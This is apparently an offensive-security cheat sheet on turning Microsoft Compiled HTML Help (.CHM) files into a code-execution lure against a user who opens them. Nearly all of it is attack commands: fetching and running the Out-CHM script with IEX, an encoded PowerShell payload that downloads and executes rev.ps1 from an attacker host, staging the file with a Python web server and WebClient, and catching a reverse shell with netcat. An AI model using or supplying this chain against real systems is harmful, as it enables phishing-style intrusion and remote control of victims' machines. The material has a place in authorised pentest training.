PRIMARY CATEGORY β FILE MANIPULATION
CHM β Microsoft Compiled HTML Help Files
This type of file are often used for software documentation, training guides and electronic newsletters
It is a collection of HTML Pages, images and other multimedia resources
This files are compressed and deployed in a binary format
Exploitation
A malicious .CHM file can be crafted and deployed to execute arbitrary code once opened by anyone
Thefore, letβs suppose that there is a user on the target who is reviewing manually a certain directory to search for any valid CHM files to open them and inspect their content
Payload Creation - CHM File
We can use Out-CHM to create a malicious CHM file which run arbitrary code once opened and leave it inside the mentioned directory
From the Attacker βοΈ
Download and Import the Powershell Script
IEX (Invoke-RestMethod -UseBasicParsing -Uri 'https://github.com/samratashok/nishang/raw/refs/heads/master/Client/Out-CHM.ps1')Malicious CHM Creation
The created CHM file will run the following payload β
echo -n "IEX (IWR -UseBasicParsing -Uri http://<IP_ADDRESS>:<PORT>/rev.ps1)" | iconv --to-code UTF-16LE | base64 -w 0 ; echo- CHM File
Out-CHM -Payload "powershell.exe -EncodedCommand SQBFAFgAIAAoAEkAVwBSACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADMAMAA6ADgAOAA4ADgALwByAGUAdgAuAHAAcwAxACkA" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"Payload Transfer
From the Attacker
python3 -m http.server <PORT>From the Target
(New-Object Net.WebClient).DownloadFile('http://<ATTACKER_IP>:<PORT>/<CHM_FILE>', 'C:\ProgramData\<CHM_FILE>')CHM Execution
Once the malicious CHM file is stored in the directory checked by the system user, just wait for the user to open this file and get the command execution.
In this case a reverse shell
From the Attacker βοΈ
rlwrap -CaR nc -nlvp <PORT>